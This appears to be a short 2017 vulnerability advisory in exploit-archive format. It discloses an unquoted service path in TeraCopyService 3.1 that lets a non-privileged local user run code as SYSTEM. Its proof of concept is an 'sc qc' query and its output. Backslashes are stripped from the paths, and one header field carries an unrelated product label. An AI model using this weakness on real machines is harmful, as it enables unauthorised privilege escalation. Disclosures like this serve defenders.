TeraCopyService 3.1 Unquoted Service Path Privilege Escalation
Posted on 04 September 2017
# Exploit Title: TeraCopyService 3.1 - Unquoted Service Path Privilege Escalation # Date of Discovery: August 31 2017 # Exploit Author: Rithwik Jayasimha # Author Homepage/Contact: https://thel3l.me # Vendor Name: Codesector # Vendor Homepage: http://www.codesector.com/ # Software Link: TOVA 8.2-202 - http://www.codesector.com/teracopy # Affected Versions: <3.1 confirmed, possibly later versions # Tested on: Windows 7 # Category: local # Vulnerability type: Local Privilege Escalation # Description: Teracopy installs a service ("TeraCopyService") with an unquoted service path running with SYSTEM privileges. This allows any non-privileged local user to execute arbitrary code with SYSTEM privileges. # Proof Of Concept: C:Userspotato> sc qc TeraCopyService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: TeraCopyService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:Program FilesTeraCopyTeraCopyService.exe LOAD_ORDER_GROUP : System Reserved TAG : 0 DISPLAY_NAME : TeraCopy Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem